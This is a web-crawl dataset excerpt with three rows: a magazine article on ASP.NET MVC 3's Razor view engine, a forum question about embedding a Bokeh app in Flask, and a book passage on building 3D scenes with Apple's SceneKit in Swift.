text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Ask Kathleen This month's Ask Kathleen column answers your questions about the new Razor view engine in Microsoft's Model-View-Controller framework. Part 1 of 2. Q: What's new in ASP.MVC 3? A: Microsoft released the latest version of its Model-View-Controller (MVC) framework in January. The source code for the Web application framework, which is based on ASP.NET and the Microsoft .NET Framework 4, is available under the Microsoft Public License (Ms-PL). ASP.NET MVC 3 offers significant improvements in three key areas: view creation, client-side support and extensibility. Extensibility deserves a column of its own, so I'll focus on the other features in this month's column. ASP.NET MVC 3 can be installed side-by-side with ASP.NET MVC 2. The MVC view you create inside Visual Studio 2010 (earlier versions are not supported) is a template that's executed by a view engine to create .NET Framework-based code. This code is later run by your server to produce HTML output (see Figure 1). Previous versions of ASP.NET MVC offered a single view engine supporting ASP.NET WebForms style syntax. It isn't ASP.NET WebForms, but it uses the same delimiters and syntax, making initial immersion into writing MVC views easy. The framework also allowed alternate view engines, and several were created within the community. New View Engine With ASP.NET MVC 3, Microsoft offers a new view engine called Razor that supports a unique templating language. ASP.NET MVC 3 also introduces the ability to simultaneously run multiple view engines in a single project (Web site). Running multiple view engines is important if you want to run existing ASP.NET WebForms style views alongside Razor views. Razor views use the new Razor templating language. The core requirement of a templating language is to isolate literal code from expressions that return output and template logic. Most templating languages do this with an open and close construct surrounding either the literal -- or more commonly -- the expressions and code logic. But Razor is not a general-purpose templating language -- it expects C# or Visual Basic syntax for expressions and code logic embedded within HTML. Because it assumes this language context it can imply intent, use a single opening delimiter (the @ sign) and, in many cases, recognize the block close and return to literal output. When Razor can't imply intent, you can explicitly open and close template logic with curly brackets and expressions with parentheses in C# Razor templates. This results in clean syntax. The opening of the default Index.cshtml from the Web application MVC 3 project (with Razor selected as the view engine) illustrates the two most important constructs: @{ViewBag.Title = "Home Page";}<h2>@ViewBag.Message</h2> The first @ indicates a Razor code block. The curly brackets are required so that Razor can distinguish between setting the title of the ViewBag and outputting the title followed by = "Home Page" The expression that outputs the message doesn't require a closing bracket because Razor recognizes the < as a return to HTML. Within the code block, all C# rules apply, including the semicolon line delimiter. When the @ sign is followed by keyword, the curly brackets aren't needed and Razor is able to determine what code to execute, and what to output as literals: @foreach (var item in Model) {<tr><td>@item.CustomerNumber</td><td>@item.Name</td></tr>} The Visual Basic version of the default Index templates shows the same expression syntax, but more verbose logic delimiters: @CodeViewData("Title") = "Home Page"End Code<h2>@ViewData("Message")</h2> In all cases, Visual Studio helps by highlighting the Razor delimiters in bright yellow and the Razor code with a pale blue background (with standard Visual Studio colors) so you can tell what will be executed and what will output as literals. Sometimes, Razor inference may not represent your intent for a complex expression. When this occurs, simply surround your expression with parentheses in either C# or Visual Basic. The first line outputs "2 + 2" and the second outputs "4": @{var x = 2; }<p>@x + 2</p><p>@(x + 2)</p><</a> Razor adds a ToString call to any non-string output. The last line illustrates another reason you might need to define the end of your expression: Razor would consider the trailing text (.jpg) part of the expression. You can also use explicit syntax to include C# generics. Razor will otherwise interpret the < as a tag element opening. Occasionally Razor may interpret content as code. This happens if the content doesn't start with an HTML tag and lies within a code block. You can explicitly switch from code to markup with the @: character sequence: @foreach (var item in Model) {@: Item name: @item.FirstName } If you need to include comments or comment-out code, you can use the @*: @* comment *@ One of the best Razor features is one you may not notice. The team did a great job of determining whether you're working in code or HTML and offering the appropriate context-based IntelliSense. The Visual Basic and C# templates illustrate two different approaches to ViewData that work in both languages. ViewBag is new and simply a version of ViewData that's of dynamic type. Simultaneous use of the two styles won't confuse MVC, though I doubt your teammates would appreciate it. The ViewBag allows the simpler, non-quoted syntax, although neither version has any type safety or IntelliSense. While Razor is not a general-purpose generation language, you can use it outside of MVC and can find a good explanation of this usage on Rick Strahl's blog. If your templates are known at compile time, preprocessed text templates are probably easier to use. Your Razor view is derived from the generic System.Web.Mvc.WebViewPage class; however, you don't need to specify this explicitly in your view. If you specify nothing, your view will derive from the dynamic version of the base class. More often, you'll use the @model directive to indicate the type of your model, which may be either a type for simple data or one of the IEnumerable types for list data: @model IEnumerable<CustomerModel> The Razor engine supports layouts. Layouts serve the same purpose as master pages, offering consistent elements and layout. Layouts can be nested and you can explicitly specify them in the view. You can also define initializing behavior for all the views in your site through the _ViewStart.cshtml. Defining the layout in this file applies it across all pages of your project. If some need a different layout, you can set it explicitly in the page to override the ViewStart.cshtml behavior. If you need to skip the layout on a page, simply set the Layout property to null. While the most likely use of _ViewStart will be setting layouts, it can contain any initialization code you want run for all your pages. Layouts are merged into your page so the resulting HTML displays no artifacts of this creation detail. Within the layout you specify the location of content with the @RenderBody directive. If you'd like to insert different portions of your content in different places, you can insert the @RenderSection directive in your layout, passing the section name. Within your view you define sections with the @Section directive: @section Summary {@Html.DisplayFor(Model.FullName);@* additional content *@} This combination of features allows complex layouts that are easy to create and maintain. Controllers have a couple of improvements in ASP.NET MVC 3. You can apply global action filters, which are especially convenient for error and logging filters. Controllers return action filters and MVC 3 supplies two new action filters: -HTTPNotFoundResult and HTTPStatusCodeResult. Also, the RedirectResult has a Permanent property and the default controller has a new RedirectPermanent method. The permanent redirect issues a 301 redirect, rather than the non-permanent 302 redirect. Asynchronous JavaScript and XML (AJAX) improvements include automatic model binding to JavaScript Object Notation (JSON) data. This allows incoming JSON parameters to be filled behind the scenes by the default model binder. MVC already had a JSON result to manage outgoing JSON data. Controllers now support output caching of child actions. Child actions allow you to compose action output from several potentially reusable components. Caching at this granular level can significantly reduce the server load and improve performance in some pages. The .NET Framework 4 data annotations namespace got a boatload of new data annotation attributes. ASP.NET MVC 3 leverages these attributes, allowing richer declarative validation. These new attributes include DisplayAttribute, UIHintAttribute and EditableAttribute. The default model metadata provider, DataAnnotationsModelMetadataProvider, uses these attributes in creating model metadata, which can be used to make decisions in views and for server-side and client-side validation. Web development is moving toward the declarative style of HTML5. Instead of requiring JavaScript code in the page to provide the client-side experience, HTML5 offers a standard set of attributes to declare the intended behavior and allow common code libraries to do the real work. This approach of avoiding code in the page is called unobtrusive JavaScript and is supported by MVC 3. Unobtrusive JavaScript makes cleaner, smaller HTML. But the real benefit is the declarative approach that removes library dependencies from your HTML. This allows you to switch JavaScript libraries in the future with relative ease. The current hot JavaScript library is jQuery. Microsoft adds jQuery validation in ASP.NET MVC 3. The company is contributing to the jQuery library and two significant future plug-ins: one for templating and one for localization.
https://visualstudiomagazine.com/articles/2011/03/01/delve-into-aspnet-mvc-3.aspx
CC-MAIN-2020-34
refinedweb
1,599
56.15
1.Preparing to use the device with the "built-in" Attiny 85 In case of having the device with the micro already installed and to use it with our project we will need the following: -Download the Arduino IDE: We download the version and desired and then we will need to make an initial configuration. -Bookstores and cards: Open the downloaded program and a window will open with a blank project. We proceed to select the preferences option in the files tab. Once the window is opened, enter the following URL: If we have a URL already entered, it is not necessary to delete it, we simply add the new one below. We give OK to all windows to save the changes. Then we must go to Tools-Board-Card Manager. When the card manager opens we will need to look for AttinyCore and install it to have support for our ATTiny85. Once this is done, we will have support to program the microcontroller integrated into the card. Now we will need to install the library of the NeoPixels to be able to use them easily. This is done from Program-Include Library-Manage Library. We searched for NeoPixel and installed the library as shown below. We will also need to install the RTClib library to have real-time clock support that the card has integrated. Once this is done we are ready to start programming our card. The good thing about the Arduino IDE is that there are many libraries available to execute functions or integrate peripherals in a very simple way, you can install as many as you need since these are installed on the PC but when integrating them into the project you must be careful since these consume resources of the microcontroller and we can easily run out of space. 2.Create a program, compile it and upload it to the microcontroller to run it. To create an Arduino program we must first of all integrate the libraries that we download for that you can copy the following text at the beginning of the sketch without deleting anything. #include <Adafruit_NeoPixel.h> #include <RTClib.h> #define NUM_LEDS 54 #define BUTTON 4 RTC_DS3231 rtc; Adafruit_NeoPixel strip = Adafruit_NeoPixel(NUM_LEDS, 1, NEO_GRB + NEO_KHZ800); Now you are ready to write your programs and make use of all the functions to program the ATtiny 85 microcontroller you can follow this tutorial to use an Arduino one as a programmer. To use as a display from another microcontroller: You can use the display from any microcontroller for your project by welding the pin corresponding to the data of the NeoPixels to the pad "Display", you can also take the input of the button present on the card by welding to the button pin. You can find examples of how to use the display and more information in the code examples. User manual for the watch function. Fig1. Fig2. -To turn on the card simply connect the USB cable to the micro USB port of the card and the other end to any available USB port. -You will be shown the welcome message and then the last hour set with the color and brightness due to defects or saved by the user in the last configuration will be shown. -To place the card in a vertical position, remove the stand as indicated in fig1. Then with the USB cable connected slide the notch of the stand from the bottom up as indicated in fig2. -To adjust the time simply press the OPTIONS/ENTER button at the top of the card as shown in...Read more »
https://hackaday.io/project/181749-business-card-size-4-digits-clock
CC-MAIN-2021-49
refinedweb
601
65.46
This as Serverless Computing or NoOps. AWS provisions, scales, and manages servers needed to run your code, referred to as the Lambda function. You pay only for the actual time your Lambda function runs. You are charged in 0.1 second increments multiplied by the number of Lambda function invocations. You are only required to provide the amount of computing memory (the default is 128MB). CPU is allocated in proportion to the requested memory. You write code as Lambda functions. They can respond to changes (events) in other AWS services (sources of events), such as an S3 update or HTTP requests and interact with external resources like Amazon DynamoDB or other web services. Notes: Requesting 256MB of memory for your Lambda function allocates approximately twice as much computing power as in case of the default 128MB of memory. 1.2 Supported Languages As of 2017, Lambda gives you a choice of Node.js (JavaScript), Python 2.7 , Java 8 and C#. Lambda provides the Amazon Linux build of openjdk 1.8 and C# is distributed as a NuGet package with the “dotnetcore1.0” runtime parameter. Lambda functions can used dependent libraries, including native ones. There is no white-list APIs. Your code can spawn additional threads, if needed. Notes: According to Lambda documentation, “There are a few activities that are disabled: Inbound network connections are blocked by AWS Lambda, and for outbound connections only TCP/IP sockets are supported, and ptrace (debugging) system calls are restricted. TCP port 25 traffic is also restricted as an anti-spam measure.“ 1.3 Getting Your Code Up And Running in Lambda You have three options: Create your Lambda function code inside the AWS Management Console (the in-line option) ✔ Only available for Node.js and Python runtimes Develop code locally, build a ZIP or JAR bundle with all the dependencies and upload it to AWS Upload your ZIP or JAR to S3 Notes: According to Lambda documentation, “Uploads must be no larger than 50MB (compressed). You can use the AWS Eclipse plugin to author and deploy Lambda functions in Java. You can use the Visual Studio plugin to author and deploy Lambda functions in C#, and Node.js .… You can define Environment Variables as key-value pairs that are accessible from your function code. These are useful to store configuration settings without the need to change function code. Learn more. For storing sensitive information, we recommend encrypting values using KMS and the console’s encryption helpers.“ 1.4 Examples of the Base Lambda Function 1.5 Use Cases Some of the user cases are , high throughput real-time workflows handling billions of events per day, back-ends for you apps, media objects transcoding, real-time tracking of calls made to any Amazon Web Service from your app, front-end HTTP service. You can invoke your Lambda function via an HTTP endpoint using Amazon API Gateway 1.6 How It Works AWS Lambda functions run inside a default AWS-managed VPC on the computing infrastructure provided by AWS. Optionally, you can configure Lambda to run within your custom VPC.It is highly recommended you write your code in a “stateless” style. Any state you may want to retain beyond the lifetime of the request should be externalized to an AWS persistent store, e.g. Amazon S3, Amazon DynamoDB, etc.You can configure triggers for the Lambda, such as uploading a file on S3, that will cause the Lambda to be executed. You can also invoke lambda functions directly using the AWS SDKs or AWS Mobile SDKs, such as the AWS Mobile SDK for Android. Lambda provides a great foundation for building microservices. Notes: According to Lambda documentation, “To improve performance, AWS Lambda may choose to retain an instance of your function and reuse it to serve a subsequent request, rather than creating a new copy. Your code should not assume that this will always happen.“ 1.7 Example: Processing S3 Source Events with Lambda Source: AWS Documentation 1.8 The Programming Model The following core concepts apply to Lambda functions created in any of the supported languages: ◊ Handler – The user call-back function invoked by AWS Lambda in response to a registered event; this function is passed the event object and the context object ◊ The context object – The AWS Lambda object that provides information of the call context ◊ Logging – Any user Lambda function can contain language-specific logging statements output of which AWS redirects to CloudWatch Logs Notes: According to Lambda documentation: “AWS Lambda provides this information via the context object:.” 1.9 Configuring Lambda Functions The Lambda Dashboard of the AWS Management Console offers you a wizard-like Lambda function creation flow, where you need to specify the source of events to which your lambda function will be triggered to respond, provide the function body written in the language of your choice(write code in-line or upload the ZIP file containing your code), Specify the role under which your code will be running and optionally, provide memory size (default is 128 MB), the call timeout (a value between the default 3 seconds and the maximum of 5 minutes ), and configuration key-value pairs. 1.10 Configure Triggers Page 1.11 Lambda Function Blueprints You have an option to either create a Lambda function from scratch, or use Lambda blueprints A Lambda blueprint is a sample configuration of an event source and a skeletal Lambda function for handling such events As of 2017, Lambda offers 78 blueprints, such as ◊ dynamodb-process-stream “An Amazon DynamoDB trigger that logs the updates made to a table“ ◊ lex-book-trip-python “Book details of a visit, using Amazon Lex to perform natural language understanding“ ◊ microservice-http-endpoint “A simple backend (read/write to DynamoDB) with a RESTful API endpoint using Amazon API Gateway” 1.12 How Do I Troubleshoot and Monitor My Lambda Functions? AWS Lambda automatically monitors your Lambda functions reporting the following real-time metrics through Amazon CloudWatch: ◊ Invocation count ◊ Invocation duration ◊ Invocation errors You can use these metrics to set CloudWatch custom alarms The CloudWatch Logs group associated with your Lambda function can be accessed by this logical path: /aws/lambda/<your function name> 1.13 Developing Lambda in Java You can create a Lambda in a plain Maven project or use the AWS Toolkit plugin for Eclipse. If you are using Maven, add dependency for com.amazonaws:aws-lambda-java-core. Develop POJO classes that will carry request and response data. Develop the Lambda class which must implement public class MyLambda implements RequestHandler<MyRequest, MyResponse> { public MyResponse handleRequest(MyRequest request, Context context) { //… } } Build a JAR file that includes all the dependency classes and upload it in for your Lambda. 1.14 Summary In this article , we reviewed the AWS Lambda service that provides an excellent platform for building microservices in the Amazon Cloud.
https://www.webagesolutions.com/blog/aws-lambda
CC-MAIN-2022-05
refinedweb
1,141
50.77
derelict-mpg123 0.1.2 A dynamic binding to libmpg123 To use this package, run the following command in your project's root directory: Manual usage Put the following dependency into your project's dependences section: DerelictMPG123 Dynamic binding to libmpg123 library (mp3 decoder) for D language libmpg123 is free software licensed under LGPL 2.1. Project page: Docs: Usage of binding: import derelict.mpg123; DerelictMPG123.load(); // now you can use mpg123 methods - Registered by Vadim Lopatin - 0.1.2 released 5 years ago - buggins/DerelictMPG123 - github.com/buggins/DerelictMPG123 - Boost - Authors: - - Dependencies: - derelict-util - Versions: - Show all 4 versions - Download Stats: 0 downloads today 0 downloads this week 2 downloads this month 117 downloads total - Score: - 0.5 - Short URL: - derelict-mpg123.dub.pm
https://code.dlang.org/packages/derelict-mpg123
CC-MAIN-2021-43
refinedweb
125
53.51
A wrapper around the VMD code that implements the VideoDecoder API. More... #include <coktel_decoder.h> List of all members. A wrapper around the VMD code that implements the VideoDecoder API. Definition at line 576 of file coktel_decoder.h. Audio::Mixer::kPlainSoundType [virtual] Close the active video stream and free any associated resources. All subclasses that need to close their own resources should still call the base class' close() function at the start of their function. Reimplemented from Video::VideoDecoder. Load a video from a generic read stream. The ownership of the stream object transfers to this VideoDecoder instance, which is hence also responsible for eventually deleting it. Implementations of this function are required to call addTrack() for each track in the video upon success. Implements Video::VideoDecoder. [private] Definition at line 620 of file coktel_decoder.h. Definition at line 618 of file coktel_decoder.h. Definition at line 619 of file coktel_decoder.h.
https://doxygen.residualvm.org/d6/d8e/classVideo_1_1AdvancedVMDDecoder.html
CC-MAIN-2020-29
refinedweb
152
60.31
Nov 26, 2008 04:04 PM|donb|LINK So I have built HMC 4.5 pretty much per the walk-through. I'm having trouble with W08-DWHE.97, here's the output: <response> <errorContext description="The server 'EXCASOAB01' is not configured with a distribution point." code="0x80004005" executeSeqNo="111"> <errorSource namespace="Error Provider" procedure="SetError"/> <errorSource namespace="Managed Email 2007" procedure="AddOABCAS"/> </errorContext> </response> If I do a Get-OabVirtualDirectory in the Exchange mgt shell from MPS01 I get this: [PS] >Get-OabVirtualDirectory Get-OabVirtualDirectory : Unable to create Internet Information Services (IIS) directory entry. Error message is: Access is denied. . HResult = -2147024891. At line:1 char:23 + Get-OabVirtualDirectory <<<< On EXCASOAB01 I get this: [PS] >Get-OabVirtualDirectory Server Name Internal Url External Url ------ ---- ------------ ------------ EXCAS01 OAB (Default Web...... EXCASOAB01 OAB (OABDistribu......... What should I do next - what do I need to be looking at? Nov 26, 2008 11:36 PM|PowerK6|LINK Hi donb, As the help file says, you might receive an error even you have followed the procedures correctly: Note: If you run into an error message indicating that EXCASOAB01 is not configured with a distribution point, use the Exchange Management Console to change the internal URL of the OAB distribution to a non-existing URL (for example,), and make a copy of the original URL. Then, repeat the above procedure to add EXCASOAB01 into the default OAB CAS pool. After the addition is complete, change the internal URL of the OAB distribution back to the original. Or you can use PowerShell (Exchange Management Shell) to change it: $oabUrl = Get-OABVirtualDirectory echo $oabUrl.InternalUrl Get-OabVirtualDirectory | Set-OabVirtualDirectory -InternalUrl <New non-existing OAB URL> Go back to the Command window and run the provtest AddOABCAS.xml x2 again. Should work this time. Then set it back to original: Get-OabVirtualDirectory | Set-OabVirtualDirectory -InternalUrl $oabUrl.InternalUrl -Randy All-Star 44551 Points MVP Dec 04, 2008 04:49 AM|TATWORTH|LINK >Excellent advice As your question appears to have been answered, please click the "Mark as answered" against one or more of the replies (even your own if relevant). Dec 04, 2008 06:57 PM|harv|LINK I still get the error even after changing the internal URL to something else. Only difference that i have is my server is named excas0ab1 rather than excas0ab01. Any help is greatly appreciated The account i am using can read the information from AD correctly. Dec 04, 2008 07:02 PM|harv|LINK Server name is EXCASOAB1 rather than EXCASOAB01 as mentioned in HMC help file not sure if that is causing the issue rest all the steps have been completed successfully. After increasing logging i see following info in event viewer Event Type: Information Event Source: Exchange 2007 Provider Event Category: None Event ID: 0 Date: 12/4/2008 Time: 3:54:43 PM User: N/A Computer: MPS01 Description: Procedure='GetOABVDir' <executeXml><context><securityContext trustee="HM-EMC\administrator" impersonate="0" /><transactionContext transactionId="{56066DFA-62CB-4C38-9792-B0A4A70BF351}" /><executeContext procedure="GetOABVDir" procedureExecId="92" providerSource="Microsoft.Provisioning.Providers.Exchange2007Provider.Provider" namespace="Exchange 2007 Provider" type="read" /></context><executeData><oabVDirs /></executeData></executeXml> None 0 Points None 0 Points May 11, 2009 02:45 PM|MattGahan3|LINK Add my woes to this growing list. Exactly the same error; <response><errorContext description="The server 'EXCAS' is not configured with a distribution point." code="0x80004005" executeSeqNo="99"><errorSource namespace ="Error Provider" procedure="SetError"/><errorSource namespace="Managed Email 20 07" procedure="AddOABCAS"/></errorContext></response> I have set provtest logging to level 5 and its not reporting anything weird. I am using domain/administrator account to exectute the requests and have checked both IIS and the exchange console to ensure i have followed the procedure. I can login to the website virtual directory with my equivalent of the '' url and have tried numerous variations (the use of the term ' non-existing URL' is a little confusing here, is the intention to deliberately set a domain that can't be found or one that can?... i tried both, same result. The distribution point is most definately there, website configured, external certificate installed. Additionaly i have rebooted the AD's and the servers in sequence, flushed dns etc... Now quite desperate as i can't see any way of extracting any more information about what is going wrong here! Any more clues gratefully received .... realy gutting as everything had gone absolutely without a hitch till this point! Kind Regards, Matt Gahan Jun 19, 2009 01:44 AM|Dancrai|LINK Hi, I am new to this forum and to HMC as well. I was would really appreciate any additional information on this issue, because if the listed fix of changing the Internal URL to a non existant URL and re-running the Provtest AddOABCAS.xml /x2 does not fix the issue, then there are no next steps that I can find. I have worked back through the Technet article to confirm all step have been completed correctly. I have tried using both excas01 and excasoab01 as the OAB Web distribution folder, but I get the same error for both. I can see both servers listed correctly if I run a Get-OABVirtualDirectory from the Exchange Management Shell. Any more information would be gratefully appreciated Thanks Adrian None 0 Points Jul 01, 2009 05:27 AM|julian.wilkins@grologic.co.uk|LINK I've had the same problem with the provtest addoabcas.xml /x2 command. I'm currently going through the TechNet deployment walkthrough for HMC 4.5, and I'm installing it on Hyper-V using virtual machines. I trawled the internet for ages trying to find a solution, tried the various ones offered but none worked. I also removed the multiple DNS entries that were being created when assigning 2 IPs to the same network card. I eventually gave up, and tried the next stage (provtest addexchangeresources.xml /x2) and that also failed. Exasperated, I gave up, turned off all the virtual servers and went home. Next day, I booted up all the virtual servers in turn (starting with AD01, AD02, MPSSQL01, MPSSQL02, EXMBX01-NODE1, EXMBX01-NODE2, MPSSQL01, MPSSQL02, OMSQL01 and then the rest) and tried the same command again on MPS01, and this time it worked. Note that I did have the internal URL of EXCASOAB01 still set to, although I had tried this the previous day and it didn't work. So, my suggestion is to shut every single server down and then reboot them in sequence. It's one of those "it shouldn't make a difference" but in my case it did. Quite bizarre. I hope this helps other people with this problem. 9 replies Last post Jul 01, 2009 05:27 AM by julian.wilkins@grologic.co.uk
https://forums.asp.net/t/1353585.aspx?Procedure+W08+DWHE+97+provtest+AddOABCAS+xml+fails+miserably
CC-MAIN-2021-25
refinedweb
1,122
53.41
Hi, I have a bokeh app which i am trying to render thru Flask. Bokeh and Flask are installed on Ubuntu VM (on AWS, just in case that matters). The below code works only if i replace localhost:5006/env with the public.ip:5006/env. If i change the url in the below code to locahost:5006/env i get a blank page (at my.public.ip:5000). from bokeh.resources import CDN from flask import Flask, render_template from bokeh.embed import server_document,server_session from bokeh.client import pull_session app = Flask(name) @app.route("/") def index(): myurl = “” bokeh_script = server_document(myurl) return render_template(“index.html”,bokeh_script=bokeh_script) #run the app if name == “main”: app.run(host=‘0.0.0.0’) #app.run(debug=True) Any idea why this is happening? What could be the fix for it? I am trying not to hardcode the public IP in my code.
https://discourse.bokeh.org/t/empty-page-when-flask-configured-to-localhost/6579
CC-MAIN-2020-50
refinedweb
149
69.89
So, this is it! Finally, we move from the 2D world to 3D. With SceneKit, we can make 3D games quite easily, especially since the syntax for SceneKit is quite similar to SpriteKit. When we say 3D games, we don't mean that you get to put on your 3D glasses to make the game. In 2D games, we mostly work in the x and y coordinates. In 3D games, we deal with all three axes x, y, and z. Additionally, in 3D games, we have different types of lights that we can use. Also, SceneKit has an inbuilt physics engine that will take care of forces such as gravity and will also aid collision detection. We can also use SpriteKit in SceneKit for GUI and buttons so that we can add scores and interactivity to the game. So, there is a lot to cover in this article. Let's get started. The topics covered in this article by Siddharth Shekar, the author of Learning iOS 8 Game Development Using Swift, are as follows: - Creating a scene with SCNScene - Adding objects to a scene - Importing scenes from external 3D applications - Adding physics to the scene - Adding an enemy (For more resources related to this topic, see here.) Creating a scene with SCNScene First, we create a new SceneKit project. It is very similar to creating other projects. Only this time, make sure you select SceneKit from the Game Technology drop-down list. Don't forget to select Swift for the language field. Choose iPad as the device and click on Next to create the project in the selected directory, as shown in the following screenshot: Once the project is created, open it. Click on the GameViewController class, and delete all the contents in the viewDidLoad function, delete the handleTap function, as we will be creating a separate class, and add touch behavior. Create a new class called GameSCNScene and import the following headers. Inherit from the SCNScene class and add an init function that takes in a parameter called view of type SCNView: import Foundation import UIKit import SceneKit class GameSCNScene: SCNScene{ let scnView: SCNView! let _size:CGSize! var scene: SCNScene! required init(coder aDecoder: NSCoder) { fatalError("init(coder:) has not been implemented") } init(currentview view: SCNView) { super.init() } } Also, create two new constants scnView and _size of type SCNView and CGSize, respectively. Also, add a variable called scene of type SCNScene. Since we are making a SceneKit game, we have to get the current view, which is the type SCNView, similar to how we got the view in SpriteKit where we typecasted the current view in SpriteKit to SKView. We create a _size constant to get the current size of the view. We then create a new variable scene of type SCNScene. SCNScene is the class used to make scenes in SceneKit, similar to how we would use SKScene to create scenes in SpriteKit. Swift would automatically ask to create the required init function, so we might as well include it in the class. Now, move to the GameViewController class and create a global variable called gameSCNScene of type GameSCNScene and assign it in the viewDidLoad function, as follows: class GameViewController: UIViewController { var gameSCNScene:GameSCNScene! override func viewDidLoad() { super.viewDidLoad() let scnView = view as SCNView gameSCNScene = GameSCNScene(currentview: scnView) } }// UIViewController Class Great! Now we can add objects in the GameSCNScene class. It is better to move all the code to a single class so that we can keep the GameSceneController class clean. In the init function of GameSCNScene, add the following after the super.init function: scnView = view _size = scnView.bounds.size // retrieve the SCNView scene = SCNScene() scnView.scene = scene scnView.allowsCameraControl = true scnView.showsStatistics = true scnView.backgroundColor = UIColor.yellowColor() Here, we first assign the current view to the scnView constant. Next, we set the _size constant to the dimensions of the current view. Next we initialize the scene variable. Then, assign the scene to the scene of scnView. Next, enable allowCameraControls and showStatistics. This will enable us to control the camera and move it around to have a better look at the scene. Also, with statistics enabled, we will see the performance of the game to make sure that the FPS is maintained. The backgroundColor property of scnView enables us to set the color of the view. I have set it to yellow so that objects are easily visible in the scene, as shown in the following screenshot. With all this set we can run the scene. Well, it is not all that awesome yet. One thing to notice is that we have still not added a camera or a light, but we still see the yellow scene. This is because while we have not added anything to the scene yet, SceneKit automatically provides a default light and camera for the scene created. Adding objects to a scene Let us next add geometry to the scene. We can create some basic geometry such as spheres, boxes, cones, tori, and so on in SceneKit with ease. Let us create a sphere first and add it to the scene. Adding a sphere to the scene Create a function called addGeometryNode in the class and add the following code in it: func addGeometryNode(){ let sphereGeometry = SCNSphere(radius: 1.0) sphereGeometry.firstMaterial?.diffuse.contents = UIColor.orangeColor() let sphereNode = SCNNode(geometry: sphereGeometry) sphereNode.position = SCNVector3Make(0.0, 0.0, 0.0) scene.rootNode.addChildNode(sphereNode) } For creating geometry, we use the SCNSphere class to create a sphere shape. We can also call SCNBox, SCNCone, SCNTorus, and so on to create box, cone, or torus shapes respectively. While creating the sphere, we have to provide the radius as a parameter, which will determine the size of the sphere. Although to place the shape, we have to attach it to a node so that we can place and add it to the scene. So, create a new constant called sphereNode of type SCNNode and pass in the sphere geometry as a parameter. For positioning the node, we have to use the SCNvector3Make property to place our object in 3D space by providing the values for x, y, and z. Finally, to add the node to the scene, we have to call scene.rootNode to add the sphereNode to scene, unlike SpriteKit where we would simply use addChild to add objects to the scene. With the sphere added, let us run the scene. Don't forget to add self.addGeometryNode() in the init function. We did add a sphere, so why are we getting a circle (shown in the following screenshot)? Well, the basic light source used by SceneKit just enables to us to see objects in the scene. If we want to see the actual sphere, we have to improve the light source of the scene. Adding light sources Let us create a new function called addLightSourceNode as follows so that we can add custom lights to our scene: func addLightSourceNode(){ let lightNode = SCNNode() lightNode.light = SCNLight() lightNode.light!.type = SCNLightTypeOmni lightNode.position = SCNVector3(x: 10, y: 10, z: 10) scene.rootNode.addChildNode(lightNode) let ambientLightNode = SCNNode() ambientLightNode.light = SCNLight() ambientLightNode.light!.type = SCNLightTypeAmbient ambientLightNode.light!.color = UIColor.darkGrayColor() scene.rootNode.addChildNode(ambientLightNode) } We can add some light sources to see some depth in our sphere object. Here we add two types of light source. The first is an omni light. Omni lights start at a point and then the light is scattered equally in all directions. We also add an ambient light source. An ambient light is the light that is reflected by other objects, such as moonlight. There are two more types of light sources: directional and spotlight. Spotlight is easy to understand, and we usually use it if a certain object needs to be brought to attention like a singer on a stage. Directional lights are used if you want light to go in a single direction, such as sunlight. The Sun is so far from the Earth that the light rays are almost parallel to each other when we see them. For creating a light source, we create a node called lightNode of type SCNNode. We then assign SCNLight to the light property of lightNode. We assign the omni light type to be the type of the light. We assign position of the light source to be at 10 in all three x, y, and z coordinates. Then, we add it to the rootnode of the scene. Next we add an ambient light to the scene. The first two steps of the process are the same as for creating any light source: - For the type of light we have to assign SCNLightTypeAmbient to assign an ambient type light source. Since we don't want the light source to be very strong, as it is reflected, we assign a darkGrayColor to the color. - Finally, we add the light source to the scene. There is no need to add the ambient light source to the scene but it will make the scene have softer shadows. You can remove the ambient light source to see the difference. Call the addLightSourceNode function in the init function. Now, build and run the scene to see an actual sphere with proper lighting, as shown in the following screenshot: You can place a finger on the screen and move it to rotate the cameras as we have enabled camera control. You can use two fingers to pan the camera and you can double tap to reset the camera to its original position and direction. Adding a camera to the scene Next let us add a camera to the scene, as the default camera is very close. Create a new function called addCameraNode to the class and add the following code in it: func addCameraNode(){ let cameraNode = SCNNode() cameraNode.camera = SCNCamera() cameraNode.position = SCNVector3(x: 0, y: 0, z: 15) scene.rootNode.addChildNode(cameraNode) } Here, again we create an empty node called cameraNode. We assign SCNCamera to the camera property of cameraNode. Next we position the camera such that we keep the x and y values at zero and move the camera back in the z direction by 15 units. Then we add the camera to the rootnode of the scene. Call the addCameraNode at the bottom of the init function. In this scene, the origin is at the center of the scene, unlike SpriteKit where the origin of a scene is always at bottom right of the scene. Here the positive x and y are to the right and up from the center. The positive z direction is toward you. We didn't move the sphere back or reduce its size here. This is purely because we brought the camera backward in the scene. Let us next create a floor so that we can have a better understanding of the depth in the scene. Also, in this way, we will learn how to create floors in the scene. Adding a floor In the class, add a new function called addFloorNode and add the following code: func addFloorNode(){ var floorNode = SCNNode() floorNode.geometry = SCNFloor() floorNode.position.y = -1.0 scene.rootNode.addChildNode(floorNode) } For creating a floor, we create a variable called floorNode of type SCNNode. We then assign SCNFloor to the geometry property of floorNode. For the position, we assign the y value to -1 as we want the sphere to appear above the floor. At the end, as usual, we assign the floorNode to the root node of the scene. In the following screenshot, I have rotated the camera to show the scene in full action. Here we can see the floor is gray in color and the sphere is casting its reflection on the floor, and we can also see the bright omni light at the top left of the sphere. Importing scenes from external 3D applications Although we can add objects, cameras, and lights through code, it will become very tedious and confusing when we have a lot of objects added to the scene. In SceneKit, this problem can be easily overcome by importing scenes prebuilt in other 3D applications. All 3D applications such as 3D StudioMax, Maya, Cheetah 3D, and Blender have the ability to export scenes in Collada (.dae) and Alembic (.abc) format. We can import these scenes with lighting, camera, and textured objects into SceneKit directly, without the need for setting up the scene. In this section, we will import a Collada file into the scene. Drag this file into the current project. Along with the DAE file, also add the monster.png file to the project, otherwise you will see only the untextured monster mesh in the scene. Click on the monsterScene.DAE file. If the textured monster is not automatically loaded, drag the monster.png file from the project into the monster mesh in the preview window. Release the mouse button once you see a (+) sign while over the monster mesh. Now you will be able to see the monster properly textured. The panel on the left shows the entities in the scene. Below the entities, the scene graph is shown and the view on the right is the preview pane. Entities show all the objects in the scene and the scene graph shows the relation between these entities. If you have certain objects that are children to other objects, the scene graph will show them as a tree. For example, if you open the triangle next to CATRigHub001, you will see all the child objects under it. You can use the scene graph to move and rotate objects in the scene to fine-tune your scene. You can also add nodes, which can be accessed by code. You can see that we already have a camera 